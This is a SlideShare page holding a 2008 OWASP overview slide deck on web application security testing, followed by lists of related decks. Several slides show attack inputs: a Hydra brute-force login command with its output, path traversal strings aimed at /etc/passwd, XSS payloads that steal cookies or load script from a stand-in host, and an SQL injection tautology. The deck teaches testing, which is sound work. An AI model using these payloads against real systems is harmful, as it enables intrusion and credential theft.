SlideShare une entreprise Scribd logo

Romulus OWASP

Grupo Gesfor I+D+i
Grupo Gesfor I+D+i

This document provides an overview of the Open Web Application Security Project (OWASP). It discusses OWASP's mission to improve application security and lists some of its key projects, including the OWASP Top Ten, a list of the most critical web application security flaws. It also summarizes several common security testing techniques like information gathering, authentication testing, session management testing, and input validation testing. Tools are mentioned for each technique.

Technologie
1  sur  54
Télécharger pour lire hors ligne
OWASP OVERVIEW Alberto Pastor Nieto Informática Gesfor March 2008
OWASP The Open Web Application Security Project OWASP Top Ten OWASP Testing Guide (Tools demonstration)
OWASP The Open Web Application Security Project OWASP Top Ten OWASP Testing Guide (Tools demonstration)
OWASP Open community Interested in improving application security Not affiliated with any technology company
OWASP The Open Web Application Security Project OWASP Top Ten OWASP Testing Guide (Tools demonstration)
OWASP TOP TEN (2007) 1. Cross Site Scripting (XSS) 2. Injection Flaws 3. Malicious File Execution 4. Insecure Direct Object Reference 5. Cross Site Request Forgery (CSRF) 6. Information Leakage and Improper Error Handling 7. Broken Authentication and Session Management 8. Insecure Cryptographic Storage 9. Insecure Communications 10. Failure to Restrict URL Access
OWASP The Open Web Application Security Project OWASP Top Ten OWASP Testing Guide (Tools demonstration)
Information Gathering Testing Web Application Fingerprint Application Discovery Spidering and Googling SSL/TLS Testing Testing for File Extensions Handling Application Configuration Management Testing Old, Backup and Unreferenced Files
Information Gathering Testing Web Application Fingerprint Different servers Different responses Different versions
Information Gathering Testing Web Application Fingerprint $ nc 202.41.76.251 80 HEAD / HTTP/1.0 HTTP/1.1 200 OK Date: Mon, 16 Jun 2003 02:53:29 GMT Server: Apache/1.3.3 (Unix) (Red Hat/Linux) Last-Modified: Wed, 07 Oct 1998 11:18:14 GMT ETag: "1813-49b-361b4df6" Accept-Ranges: bytes Content-Length: 1179 Connection: close Content-Type: text/html
Information Gathering Testing Web Application Fingerprint Tools: NETCRAFT ( http://www.netcraft.com ) httprint ( http://www.net-square.com/httprint/ )
Information Gathering Testing Web Application Fingerprint
Information Gathering Application Discovery Related issues: Different base URL Non-standard ports Virtual hosts
Information Gathering Application Discovery Different base URL: Directory exploration? Google (site:www.example.com) Candidate URLs (Ex. Nessus)
Information Gathering Application Discovery Non-standard ports: nmap –P0 –sT –sV –p1-65535 192.168.1.100 Interesting ports on 192.168.1.100: (The 65527 ports scanned but not shown below are in state: closed) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 3.5p1 (protocol 1.99) 80/tcp open http Apache httpd 2.0.40 ((Red Hat Linux)) 443/tcp open ssl OpenSSL 901/tcp open http Samba SWAT administration server
Information Gathering Application Discovery Virtual hosts: $ host -t ns www.owasp.org www.owasp.org is an alias for owasp.org. owasp.org name server ns1.secure.net. owasp.org name server ns2.secure.net. http://searchdns.netcraft.com/?host
Information Gathering Spidering and Googling Spidering: wget -r http://www.example.com Googling: googlegath.pl http://www.nothink.org/perl/googlegath/
Information Gathering SSL/TLS Testing Vulnerability Scanners: Expired certificates Weak Ciphers ... Other tools: OpenSSL, SSLDigger
Information Gathering Testing for File Extensions Handling Identify underlying technologies Tools: wget curl web mirroring tools vulnerability scanners
Information Gathering Application Configuration Management Testing Typical files and y directorios conocidos Be careful with HTML comments Personalize Error Pages Only load necessary modules Minimised privileges Access (correct and incorrect) log
Information Gathering Old, Backup and Unreferenced Files Site map and technology clues Content clues Practices: look into robots.txt, sitemaps files public information (cache: site:) search files: ~ .old .bak...
Information Gathering Old, Backup and Unreferenced Files No use: mod_autoindex y mod_info (Hide unnecessary information) Correctness permisions Use CHROOT Logs recommendations
Nessus http://www.nessus.org Port Scanner Vulnerability Scanner
Business Logic Testing Automated tools find it hard to understand context People who know logic business Strong data testing
Authentication Obtain User Accounts Dictionary attacks Bruteforce attacks Pattern searching attacks
Authentication Obtain User Accounts Tools: John the Ripper Hydra Brutus Rainbow Tables
Authentication Obtain User Accounts raven@blackbox /hydra $ ./hydra -L users.txt -P words.txt www.site.com https-post-form "/index.cgi:login&name=^USER^&password=^PASS^&login=Login:Not allowed" & Hydra v5.3 (c) 2006 by van Hauser / THC - use allowed only for legal purposes. Hydra (http://www.thc.org)starting at 2009-07-04 19:16:17 [DATA] 16 tasks, 1 servers, 1638 login tries (l:2/p:819), ~102 tries per task [DATA] attacking service http-post-form on port 443 [STATUS] attack finished for wiki.intranet (waiting for childs to finish) [443] host: 10.0.0.1 login: owasp password: password [STATUS] attack finished for www.site.com (waiting for childs to finish) Hydra (http://www.thc.org) finished at 2009-07-04 19:18:34
Authentication Bypassing authentication schema • Direct page request • Parameter modification • Session IDs Prediction • SQL Injection
Authentication Bypassing authentication schema Tools: WebScarab WebGoat (Trainning)
Authentication Directory traversal/file include Known as “dot-dot-slash” 2 evaluation steps: Input vectors enumeration Testing Techniques
Authentication Directory traversal/file include Input vectors enumeration: HTTP GET y POST requests File loading HTML forms ...
Authentication Directory traversal/file include Testing Techniques: http://example.com/getUserProfile.jsp?item=../../../../etc/passwd Cookie: USER=1826cc8f:PSTYLE=../../../../etc/passwd http://example.com/index.php?file=http://www.owasp.org/malicioustxt CAREFUL WITH CHARSET!! %2e%2e%2f is ../ %2e%2e/ is ../ %2e%2e%5c is .. ..%2f is ../ %2e%2e is .. ..%5c is ..
Authentication Directory traversal/file include Tools: WebScarab Paros Burp Suite
Authentication Vulnerable remember password and pwd reset "Security questions": Multiple questions Strong questions Number of attempts CAPTCHA Sending to email
Authentication Vulnerable remember password and pwd reset Careful with “Remember password”: <INPUT TYPE="password" AUTOCOMPLETE="off"> If password is into a Cookie: In a hashed form
Session Management Logout and Browser Cache Management Testing End Web Session: • The user logs out • The user remains idle for a certain amount of time and the application automatically logs him/her out
Session Management Logout and Browser Cache Management Testing KEY: INVALIDATE SERVER-SIDE SESSION Java: HttpSession.invalidate()
Session Management Logout and Browser Cache Management Testing Other practices: End session button well visible Invalidate Cookies in client-side
Session Management Logout and Browser Cache Management Testing Tools: WebScarab Add N Edit Cookies (Firefox ext) Web Developer (Firefox ext)
Session Management Analysis of the Session Management Schema Session Tokens Analysis: Randomless Uniqueness Resistance to statistical analysis Resistance to cryptographic analysis
Session Management Cookie and Session Token Manipulation Steps: Cookie Collection Cookie Reverse Engineering Cookie manipulation
Session Management Cookie and Session Token Manipulation Tools: WebScarab Cookie Digger
Session Management Cross Site Request Forgery (CSRF) Cross-Site Request Forgery (CSRF) describes a way to force an unknowing user to execute unwanted actions on a web application in which he is currently authenticated. Recommended practices: Add session-related information in URLs Use POST Intermediate pages (“Are you sure you really want to do this?”) Use REFERER headers
Data Validation XSS (Cross Site Scripting) XSS: Code injection attacks into the various interpreters in the browser. http://server/cgi-bin/testcgi.exe? <SCRIPT>alert(“Cookie”+document.cookie)</SCRIPT> <script src=http://www.example.com/malicious-code.js></script> %3cscript src=http://www.example.com/malicious-code.js%3e%3c/script%3e x3cscript src=http://www.example.com/malicious-code.jsx3ex3c/scriptx3e Revise all input vectors
Data Validation XSS (Cross Site Scripting) Tools: OWASP CAL9000
Data Validation SQL Injection Insertion or "injection" of an SQL query via the input data from the client to the application. Example: SELECT * FROM Users WHERE Username='$username' AND Password='$password' Input: $username = 1' or '1' = '1 $password = 1' or '1' = '1 SELECT * FROM Users WHERE Username= '1' OR '1' = '1' AND Password= '1' OR '1' = '1'
Data Validation SQL Injection Tools: OWASP SQLIX SQL DUMPER
Data Validation Other Injections LDAP Injection (Lightweight Directory Access Protocol) ORM Injection (Hibernate in Java, Nhibernate in .NET, ActiveRecord in Ruby on Rails) XML Injection SSI Injection XPATH Injection IMAP/SMTP Injection System commands Injection
Data Validation Buffer overflow Issues caused by buffer overflows: Denial of service (DoS) Code Injection Code execution Practices: Update software Best practices
Denial of Service User accounts blocked (Use CAPTCHAs) Buffer overflows User specified object allocation User input as a loop counter User provide data to disk Failure to release resources Store too much data in Session
Web Services XML Structural Testing Overloading the XML parser XML Content-level Testing XML/SQL/XPath... Injections Validate Input Size Naugthy SOAP Attachments Testing Man-in-the-middle Testing
AJAX Testing Increased attack surface with many more inputs to secure Exposed internal functions of the application Client access to third-party resources with no built-in security and encoding mechanisms Failure to protect authentication information and sessions Blurred line between client-side and server-side code, resulting in security mistakes
Useful Tools OWASP Enterprise Security API OWASP Encoding (User Inputs validation) OWASP Stinger (HTTP request validation) OWASP CSRFTester Project
Any Question? OWASP http://www.owasp.org Romulus Project http://www.ict-romulus.org

Recommandé

Attack Chaining: Advanced Maneuvers for Hack Fu
Attack Chaining: Advanced Maneuvers for Hack FuAttack Chaining: Advanced Maneuvers for Hack Fu
Attack Chaining: Advanced Maneuvers for Hack FuRob Ragan
 
Intro to Web Application Security
Intro to Web Application SecurityIntro to Web Application Security
Intro to Web Application SecurityRob Ragan
 
Hacking Client Side Insecurities
Hacking Client Side InsecuritiesHacking Client Side Insecurities
Hacking Client Side Insecuritiesamiable_indian
 
DEF CON 23 - BRENT - white hacking web apps wp
DEF CON 23 - BRENT - white hacking web apps wpDEF CON 23 - BRENT - white hacking web apps wp
DEF CON 23 - BRENT - white hacking web apps wpFelipe Prado
 
Application Security Tools
Application Security ToolsApplication Security Tools
Application Security ToolsLalit Kale
 
Web Hacking
Web HackingWeb Hacking
Web HackingInformation Technology
 
Hack Into Drupal Sites (or, How to Secure Your Drupal Site)
Hack Into Drupal Sites (or, How to Secure Your Drupal Site)Hack Into Drupal Sites (or, How to Secure Your Drupal Site)
Hack Into Drupal Sites (or, How to Secure Your Drupal Site)nyccamp
 
DVWA BruCON Workshop
DVWA BruCON WorkshopDVWA BruCON Workshop
DVWA BruCON Workshoptestuser1223
 

Recommandé

Attack Chaining: Advanced Maneuvers for Hack Fu
Attack Chaining: Advanced Maneuvers for Hack FuAttack Chaining: Advanced Maneuvers for Hack Fu
Attack Chaining: Advanced Maneuvers for Hack FuRob Ragan
 
Intro to Web Application Security
Intro to Web Application SecurityIntro to Web Application Security
Intro to Web Application SecurityRob Ragan
 
Hacking Client Side Insecurities
Hacking Client Side InsecuritiesHacking Client Side Insecurities
Hacking Client Side Insecuritiesamiable_indian
 
DEF CON 23 - BRENT - white hacking web apps wp
DEF CON 23 - BRENT - white hacking web apps wpDEF CON 23 - BRENT - white hacking web apps wp
DEF CON 23 - BRENT - white hacking web apps wpFelipe Prado
 
Application Security Tools
Application Security ToolsApplication Security Tools
Application Security ToolsLalit Kale
 
Web Hacking
Web HackingWeb Hacking
Web HackingInformation Technology
 
Hack Into Drupal Sites (or, How to Secure Your Drupal Site)
Hack Into Drupal Sites (or, How to Secure Your Drupal Site)Hack Into Drupal Sites (or, How to Secure Your Drupal Site)
Hack Into Drupal Sites (or, How to Secure Your Drupal Site)nyccamp
 
DVWA BruCON Workshop
DVWA BruCON WorkshopDVWA BruCON Workshop
DVWA BruCON Workshoptestuser1223
 
DVWA(Damn Vulnerabilities Web Application)
DVWA(Damn Vulnerabilities Web Application)DVWA(Damn Vulnerabilities Web Application)
DVWA(Damn Vulnerabilities Web Application)Soham Kansodaria
 
Web Application Firewall: Suckseed or Succeed
Web Application Firewall: Suckseed or SucceedWeb Application Firewall: Suckseed or Succeed
Web Application Firewall: Suckseed or SucceedPrathan Phongthiproek
 
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourWAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourSoroush Dalili
 
MITM Attacks on HTTPS: Another Perspective
MITM Attacks on HTTPS: Another PerspectiveMITM Attacks on HTTPS: Another Perspective
MITM Attacks on HTTPS: Another PerspectiveGreenD0g
 
Web 2.0 Application Kung-Fu - Securing Ajax & Web Services
Web 2.0 Application Kung-Fu - Securing Ajax & Web ServicesWeb 2.0 Application Kung-Fu - Securing Ajax & Web Services
Web 2.0 Application Kung-Fu - Securing Ajax & Web ServicesShreeraj Shah
 
W3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesW3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesBrad Hill
 
Hacking web applications
Hacking web applicationsHacking web applications
Hacking web applicationsAdeel Javaid
 
Bsides-Philly-2016-Finding-A-Companys-BreakPoint
Bsides-Philly-2016-Finding-A-Companys-BreakPointBsides-Philly-2016-Finding-A-Companys-BreakPoint
Bsides-Philly-2016-Finding-A-Companys-BreakPointZack Meyers
 
Manindra kishore _incident_handling_n_log_analysis - ClubHack2009
Manindra kishore _incident_handling_n_log_analysis - ClubHack2009Manindra kishore _incident_handling_n_log_analysis - ClubHack2009
Manindra kishore _incident_handling_n_log_analysis - ClubHack2009ClubHack
 
HTML5 hacking
HTML5 hackingHTML5 hacking
HTML5 hackingBlueinfy Solutions
 
Hack ASP.NET website
Hack ASP.NET websiteHack ASP.NET website
Hack ASP.NET websitePositive Hack Days
 
Shreeraj-Hacking_Web_2
Shreeraj-Hacking_Web_2Shreeraj-Hacking_Web_2
Shreeraj-Hacking_Web_2guest66dc5f
 
Cyber ppt
Cyber pptCyber ppt
Cyber pptkarthik menon
 
Rahul-Analysis_of_Adversarial_Code
Rahul-Analysis_of_Adversarial_CodeRahul-Analysis_of_Adversarial_Code
Rahul-Analysis_of_Adversarial_Codeguest66dc5f
 
CSRF, ClickJacking & Open Redirect
CSRF, ClickJacking & Open RedirectCSRF, ClickJacking & Open Redirect
CSRF, ClickJacking & Open RedirectBlueinfy Solutions
 
OWASP San Diego Training Presentation
OWASP San Diego Training PresentationOWASP San Diego Training Presentation
OWASP San Diego Training Presentationowaspsd
 
Html5 Application Security
Html5 Application SecurityHtml5 Application Security
Html5 Application Securitychuckbt
 
Evolution Of The Web Platform & Browser Security
Evolution Of The Web Platform & Browser SecurityEvolution Of The Web Platform & Browser Security
Evolution Of The Web Platform & Browser SecuritySanjeev Verma, PhD
 
Neat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionNeat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionMikhail Egorov
 
Post XSS Exploitation : Advanced Attacks and Remedies
Post XSS Exploitation : Advanced Attacks and RemediesPost XSS Exploitation : Advanced Attacks and Remedies
Post XSS Exploitation : Advanced Attacks and RemediesAdwiteeya Agrawal
 
Security Analyst Workshop - 20200212
Security Analyst Workshop - 20200212Security Analyst Workshop - 20200212
Security Analyst Workshop - 20200212Florian Roth
 
Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...
Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...
Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...Jeremiah Grossman
 

Contenu connexe

Tendances

DVWA(Damn Vulnerabilities Web Application)
DVWA(Damn Vulnerabilities Web Application)DVWA(Damn Vulnerabilities Web Application)
DVWA(Damn Vulnerabilities Web Application)Soham Kansodaria
 
Web Application Firewall: Suckseed or Succeed
Web Application Firewall: Suckseed or SucceedWeb Application Firewall: Suckseed or Succeed
Web Application Firewall: Suckseed or SucceedPrathan Phongthiproek
 
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourWAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourSoroush Dalili
 
MITM Attacks on HTTPS: Another Perspective
MITM Attacks on HTTPS: Another PerspectiveMITM Attacks on HTTPS: Another Perspective
MITM Attacks on HTTPS: Another PerspectiveGreenD0g
 
Web 2.0 Application Kung-Fu - Securing Ajax & Web Services
Web 2.0 Application Kung-Fu - Securing Ajax & Web ServicesWeb 2.0 Application Kung-Fu - Securing Ajax & Web Services
Web 2.0 Application Kung-Fu - Securing Ajax & Web ServicesShreeraj Shah
 
W3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesW3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesBrad Hill
 
Hacking web applications
Hacking web applicationsHacking web applications
Hacking web applicationsAdeel Javaid
 
Bsides-Philly-2016-Finding-A-Companys-BreakPoint
Bsides-Philly-2016-Finding-A-Companys-BreakPointBsides-Philly-2016-Finding-A-Companys-BreakPoint
Bsides-Philly-2016-Finding-A-Companys-BreakPointZack Meyers
 
Manindra kishore _incident_handling_n_log_analysis - ClubHack2009
Manindra kishore _incident_handling_n_log_analysis - ClubHack2009Manindra kishore _incident_handling_n_log_analysis - ClubHack2009
Manindra kishore _incident_handling_n_log_analysis - ClubHack2009ClubHack
 
Shreeraj-Hacking_Web_2
Shreeraj-Hacking_Web_2Shreeraj-Hacking_Web_2
Shreeraj-Hacking_Web_2guest66dc5f
 
Rahul-Analysis_of_Adversarial_Code
Rahul-Analysis_of_Adversarial_CodeRahul-Analysis_of_Adversarial_Code
Rahul-Analysis_of_Adversarial_Codeguest66dc5f
 
CSRF, ClickJacking & Open Redirect
CSRF, ClickJacking & Open RedirectCSRF, ClickJacking & Open Redirect
CSRF, ClickJacking & Open RedirectBlueinfy Solutions
 
OWASP San Diego Training Presentation
OWASP San Diego Training PresentationOWASP San Diego Training Presentation
OWASP San Diego Training Presentationowaspsd
 
Html5 Application Security
Html5 Application SecurityHtml5 Application Security
Html5 Application Securitychuckbt
 
Evolution Of The Web Platform & Browser Security
Evolution Of The Web Platform & Browser SecurityEvolution Of The Web Platform & Browser Security
Evolution Of The Web Platform & Browser SecuritySanjeev Verma, PhD
 
Neat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionNeat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionMikhail Egorov
 
Post XSS Exploitation : Advanced Attacks and Remedies
Post XSS Exploitation : Advanced Attacks and RemediesPost XSS Exploitation : Advanced Attacks and Remedies
Post XSS Exploitation : Advanced Attacks and RemediesAdwiteeya Agrawal
 

Tendances (20)

DVWA(Damn Vulnerabilities Web Application)
DVWA(Damn Vulnerabilities Web Application)DVWA(Damn Vulnerabilities Web Application)
DVWA(Damn Vulnerabilities Web Application)
 
Web Application Firewall: Suckseed or Succeed
Web Application Firewall: Suckseed or SucceedWeb Application Firewall: Suckseed or Succeed
Web Application Firewall: Suckseed or Succeed
 
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourWAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
 
MITM Attacks on HTTPS: Another Perspective
MITM Attacks on HTTPS: Another PerspectiveMITM Attacks on HTTPS: Another Perspective
MITM Attacks on HTTPS: Another Perspective
 
Web 2.0 Application Kung-Fu - Securing Ajax & Web Services
Web 2.0 Application Kung-Fu - Securing Ajax & Web ServicesWeb 2.0 Application Kung-Fu - Securing Ajax & Web Services
Web 2.0 Application Kung-Fu - Securing Ajax & Web Services
 
W3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesW3 conf hill-html5-security-realities
W3 conf hill-html5-security-realities
 
Hacking web applications
Hacking web applicationsHacking web applications
Hacking web applications
 
Bsides-Philly-2016-Finding-A-Companys-BreakPoint
Bsides-Philly-2016-Finding-A-Companys-BreakPointBsides-Philly-2016-Finding-A-Companys-BreakPoint
Bsides-Philly-2016-Finding-A-Companys-BreakPoint
 
Manindra kishore _incident_handling_n_log_analysis - ClubHack2009
Manindra kishore _incident_handling_n_log_analysis - ClubHack2009Manindra kishore _incident_handling_n_log_analysis - ClubHack2009
Manindra kishore _incident_handling_n_log_analysis - ClubHack2009
 
HTML5 hacking
HTML5 hackingHTML5 hacking
HTML5 hacking
 
Hack ASP.NET website
Hack ASP.NET websiteHack ASP.NET website
Hack ASP.NET website
 
Shreeraj-Hacking_Web_2
Shreeraj-Hacking_Web_2Shreeraj-Hacking_Web_2
Shreeraj-Hacking_Web_2
 
Cyber ppt
Cyber pptCyber ppt
Cyber ppt
 
Rahul-Analysis_of_Adversarial_Code
Rahul-Analysis_of_Adversarial_CodeRahul-Analysis_of_Adversarial_Code
Rahul-Analysis_of_Adversarial_Code
 
CSRF, ClickJacking & Open Redirect
CSRF, ClickJacking & Open RedirectCSRF, ClickJacking & Open Redirect
CSRF, ClickJacking & Open Redirect
 
OWASP San Diego Training Presentation
OWASP San Diego Training PresentationOWASP San Diego Training Presentation
OWASP San Diego Training Presentation
 
Html5 Application Security
Html5 Application SecurityHtml5 Application Security
Html5 Application Security
 
Evolution Of The Web Platform & Browser Security
Evolution Of The Web Platform & Browser SecurityEvolution Of The Web Platform & Browser Security
Evolution Of The Web Platform & Browser Security
 
Neat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionNeat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protection
 
Post XSS Exploitation : Advanced Attacks and Remedies
Post XSS Exploitation : Advanced Attacks and RemediesPost XSS Exploitation : Advanced Attacks and Remedies
Post XSS Exploitation : Advanced Attacks and Remedies
 

Similaire à Romulus OWASP

Security Analyst Workshop - 20200212
Security Analyst Workshop - 20200212Security Analyst Workshop - 20200212
Security Analyst Workshop - 20200212Florian Roth
 
Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...
Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...
Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...Jeremiah Grossman
 
OWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptxOWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptxFernandoVizer
 
Web Exploitation Security
Web Exploitation SecurityWeb Exploitation Security
Web Exploitation SecurityAman Singh
 
Pentesting web applications
Pentesting web applicationsPentesting web applications
Pentesting web applicationsSatish b
 
Hacking WebApps for fun and profit : how to approach a target?
Hacking WebApps for fun and profit : how to approach a target?Hacking WebApps for fun and profit : how to approach a target?
Hacking WebApps for fun and profit : how to approach a target?Yassine Aboukir
 
Application and Website Security -- Fundamental Edition
Application and Website Security -- Fundamental EditionApplication and Website Security -- Fundamental Edition
Application and Website Security -- Fundamental EditionDaniel Owens
 
(WEB301) Operational Web Log Analysis | AWS re:Invent 2014
(WEB301) Operational Web Log Analysis | AWS re:Invent 2014(WEB301) Operational Web Log Analysis | AWS re:Invent 2014
(WEB301) Operational Web Log Analysis | AWS re:Invent 2014Amazon Web Services
 
Java Web Security Class
Java Web Security ClassJava Web Security Class
Java Web Security ClassRich Helton
 
The top 10 security issues in web applications
The top 10 security issues in web applicationsThe top 10 security issues in web applications
The top 10 security issues in web applicationsDevnology
 
Web Security - Introduction
Web Security - IntroductionWeb Security - Introduction
Web Security - IntroductionSQALab
 
Web Security - Introduction v.1.3
Web Security - Introduction v.1.3Web Security - Introduction v.1.3
Web Security - Introduction v.1.3Oles Seheda
 
Web 2.0 Hacking
Web 2.0 HackingWeb 2.0 Hacking
Web 2.0 Hackingblake101
 
Using Proxies To Secure Applications And More
Using Proxies To Secure Applications And MoreUsing Proxies To Secure Applications And More
Using Proxies To Secure Applications And MoreJosh Sokol
 
2011 and still bruteforcing - OWASP Spain
2011 and still bruteforcing - OWASP Spain2011 and still bruteforcing - OWASP Spain
2011 and still bruteforcing - OWASP SpainChristian Martorella
 
What should I do when my website got hack?
What should I do when my website got hack?What should I do when my website got hack?
What should I do when my website got hack?Sumedt Jitpukdebodin
 
04. xss and encoding
04. xss and encoding04. xss and encoding
04. xss and encodingEoin Keary
 
Security Analyst Workshop - 20190314
Security Analyst Workshop - 20190314Security Analyst Workshop - 20190314
Security Analyst Workshop - 20190314Florian Roth
 

Similaire à Romulus OWASP (20)

Security Analyst Workshop - 20200212
Security Analyst Workshop - 20200212Security Analyst Workshop - 20200212
Security Analyst Workshop - 20200212
 
Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...
Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...
Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...
 
OWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptxOWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptx
 
Web Exploitation Security
Web Exploitation SecurityWeb Exploitation Security
Web Exploitation Security
 
gofortution
gofortutiongofortution
gofortution
 
Pentesting web applications
Pentesting web applicationsPentesting web applications
Pentesting web applications
 
Hacking WebApps for fun and profit : how to approach a target?
Hacking WebApps for fun and profit : how to approach a target?Hacking WebApps for fun and profit : how to approach a target?
Hacking WebApps for fun and profit : how to approach a target?
 
Application and Website Security -- Fundamental Edition
Application and Website Security -- Fundamental EditionApplication and Website Security -- Fundamental Edition
Application and Website Security -- Fundamental Edition
 
(WEB301) Operational Web Log Analysis | AWS re:Invent 2014
(WEB301) Operational Web Log Analysis | AWS re:Invent 2014(WEB301) Operational Web Log Analysis | AWS re:Invent 2014
(WEB301) Operational Web Log Analysis | AWS re:Invent 2014
 
Java Web Security Class
Java Web Security ClassJava Web Security Class
Java Web Security Class
 
The top 10 security issues in web applications
The top 10 security issues in web applicationsThe top 10 security issues in web applications
The top 10 security issues in web applications
 
Web Security - Introduction
Web Security - IntroductionWeb Security - Introduction
Web Security - Introduction
 
Web Security - Introduction v.1.3
Web Security - Introduction v.1.3Web Security - Introduction v.1.3
Web Security - Introduction v.1.3
 
Web 2.0 Hacking
Web 2.0 HackingWeb 2.0 Hacking
Web 2.0 Hacking
 
Using Proxies To Secure Applications And More
Using Proxies To Secure Applications And MoreUsing Proxies To Secure Applications And More
Using Proxies To Secure Applications And More
 
Spa Secure Coding Guide
Spa Secure Coding GuideSpa Secure Coding Guide
Spa Secure Coding Guide
 
2011 and still bruteforcing - OWASP Spain
2011 and still bruteforcing - OWASP Spain2011 and still bruteforcing - OWASP Spain
2011 and still bruteforcing - OWASP Spain
 
What should I do when my website got hack?
What should I do when my website got hack?What should I do when my website got hack?
What should I do when my website got hack?
 
04. xss and encoding
04. xss and encoding04. xss and encoding
04. xss and encoding
 
Security Analyst Workshop - 20190314
Security Analyst Workshop - 20190314Security Analyst Workshop - 20190314
Security Analyst Workshop - 20190314
 

Plus de Grupo Gesfor I+D+i

Propuesta demostrador Cardinea
Propuesta demostrador CardineaPropuesta demostrador Cardinea
Propuesta demostrador CardineaGrupo Gesfor I+D+i
 
THOFU- Gigaconectividad jornadas de presentación del cluster Habitat en Catal...
THOFU- Gigaconectividad jornadas de presentación del cluster Habitat en Catal...THOFU- Gigaconectividad jornadas de presentación del cluster Habitat en Catal...
THOFU- Gigaconectividad jornadas de presentación del cluster Habitat en Catal...Grupo Gesfor I+D+i
 
THOFU Presentacion General corta
THOFU Presentacion General cortaTHOFU Presentacion General corta
THOFU Presentacion General cortaGrupo Gesfor I+D+i
 
Presentación contenidos a la carta en jornada lankibide
Presentación contenidos a la carta en jornada lankibidePresentación contenidos a la carta en jornada lankibide
Presentación contenidos a la carta en jornada lankibideGrupo Gesfor I+D+i
 
EduWAI: Disabilities & ict's 4 learning
EduWAI: Disabilities & ict's 4 learningEduWAI: Disabilities & ict's 4 learning
EduWAI: Disabilities & ict's 4 learningGrupo Gesfor I+D+i
 
Presentación proyecto 3D Tour
Presentación proyecto 3D TourPresentación proyecto 3D Tour
Presentación proyecto 3D TourGrupo Gesfor I+D+i
 
Romulus Project start version en
Romulus Project start version enRomulus Project start version en
Romulus Project start version enGrupo Gesfor I+D+i
 
Contenidos a la Carta Brochure
Contenidos a la Carta BrochureContenidos a la Carta Brochure
Contenidos a la Carta BrochureGrupo Gesfor I+D+i
 

Plus de Grupo Gesfor I+D+i (20)

Propuesta demostrador Cardinea
Propuesta demostrador CardineaPropuesta demostrador Cardinea
Propuesta demostrador Cardinea
 
THOFU- Gigaconectividad jornadas de presentación del cluster Habitat en Catal...
THOFU- Gigaconectividad jornadas de presentación del cluster Habitat en Catal...THOFU- Gigaconectividad jornadas de presentación del cluster Habitat en Catal...
THOFU- Gigaconectividad jornadas de presentación del cluster Habitat en Catal...
 
Triptico Redes Hibridas 2010
Triptico Redes Hibridas 2010Triptico Redes Hibridas 2010
Triptico Redes Hibridas 2010
 
THOFU Presentacion General corta
THOFU Presentacion General cortaTHOFU Presentacion General corta
THOFU Presentacion General corta
 
Omelette Project Overview
Omelette Project OverviewOmelette Project Overview
Omelette Project Overview
 
Presentación contenidos a la carta en jornada lankibide
Presentación contenidos a la carta en jornada lankibidePresentación contenidos a la carta en jornada lankibide
Presentación contenidos a la carta en jornada lankibide
 
EduWAI: Disabilities & ict's 4 learning
EduWAI: Disabilities & ict's 4 learningEduWAI: Disabilities & ict's 4 learning
EduWAI: Disabilities & ict's 4 learning
 
Brochure Cisvi
Brochure CisviBrochure Cisvi
Brochure Cisvi
 
Alta alumnos admiTI2
Alta alumnos admiTI2Alta alumnos admiTI2
Alta alumnos admiTI2
 
Presentación proyecto 3D Tour
Presentación proyecto 3D TourPresentación proyecto 3D Tour
Presentación proyecto 3D Tour
 
Romulus Project start version en
Romulus Project start version enRomulus Project start version en
Romulus Project start version en
 
InnovaEDU
InnovaEDU InnovaEDU
InnovaEDU
 
eduWAI presentacion proyecto
eduWAI presentacion proyectoeduWAI presentacion proyecto
eduWAI presentacion proyecto
 
Cantiga Tríptico
Cantiga TrípticoCantiga Tríptico
Cantiga Tríptico
 
Conecta Tríptico
Conecta TrípticoConecta Tríptico
Conecta Tríptico
 
Museos2.0 Tríptico
Museos2.0 TrípticoMuseos2.0 Tríptico
Museos2.0 Tríptico
 
Redes Híbridas Tríptico
Redes Híbridas TrípticoRedes Híbridas Tríptico
Redes Híbridas Tríptico
 
3DTour Brochure
3DTour Brochure3DTour Brochure
